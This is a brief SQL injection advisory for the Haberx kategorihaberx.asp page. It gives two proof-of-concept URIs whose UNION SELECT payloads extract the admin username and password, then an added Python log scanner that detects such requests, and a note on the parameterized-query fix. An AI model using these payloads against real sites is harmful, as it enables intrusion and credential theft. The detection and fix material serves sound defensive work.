Haberx Kategorix.ASP SQL Injection Vulnerability

An attacker can exploit this issue via a web client.

The following proof-of-concept URIs are available:

Admin username:
http://www.example.com/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_adi,1+from+uyex+where+uyex_id=1

Admin password (uppercase letters):
http://www.example.com/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_sifre,1+from+uyex+where+uyex_id=1
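A log check for the requests shown above, as an added example that is not part of the original advisory: it flags requests to kategorihaberx.asp whose `id` parameter is not a plain integer and marks UNION SELECT payloads separately. The log lines are constructed, and the seven-field layout (date, time, client IP, method, URI stem, URI query, status) and the `/haber/` path are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

TARGET = "kategorihaberx.asp"          # page named in the advisory
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)

# Constructed sample; field layout is an assumption:
# date time client-ip method uri-stem uri-query status
SAMPLE_LOG = """\
2010-01-01 10:00:01 192.0.2.10 GET /haber/kategorihaberx.asp id=13 200
2010-01-01 10:00:05 192.0.2.66 GET /haber/kategorihaberx.asp id=13+union+select+1,uyex_adi,1+from+uyex+where+uyex_id=1 200
2010-01-01 10:00:09 192.0.2.66 GET /haber/KategoriHaberx.asp ID=13%20UNION%20SELECT%201,uyex_sifre,1%20from%20uyex 200
2010-01-01 10:00:12 192.0.2.20 GET /haber/kategorihaberx.asp id=13' 500
2010-01-01 10:00:15 192.0.2.20 GET /haber/default.asp - 200
"""

def classify(uri):
    """None if not the target page, else 'ok', 'non-numeric' or 'union-select'."""
    parts = urlsplit(uri)
    if not parts.path.lower().endswith("/" + TARGET):
        return None
    verdict = "ok"
    # parse_qsl decodes '+' and %xx, so both encodings normalise to the same text
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key.lower() != "id":        # ASP reads parameter names case-insensitively
            continue
        if UNION_RE.search(value):
            return "union-select"
        if not re.fullmatch(r"\d{1,9}", value):
            verdict = "non-numeric"
    return verdict

def scan(log_text):
    """Return (client_ip, verdict) for each suspicious request to the target page."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 7:
            continue                   # skip malformed or header lines
        ip, stem, query = fields[2], fields[4], fields[5]
        uri = stem if query == "-" else stem + "?" + query
        verdict = classify(uri)
        if verdict not in (None, "ok"):
            hits.append((ip, verdict))
    return hits

if __name__ == "__main__":
    for ip, verdict in scan(SAMPLE_LOG):
        print(ip, verdict)
```

The same integer-only rule applied to `id` before it reaches the query, together with a parameterized query, is the server-side fix.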


 

Copyright 2010, SecurityFocus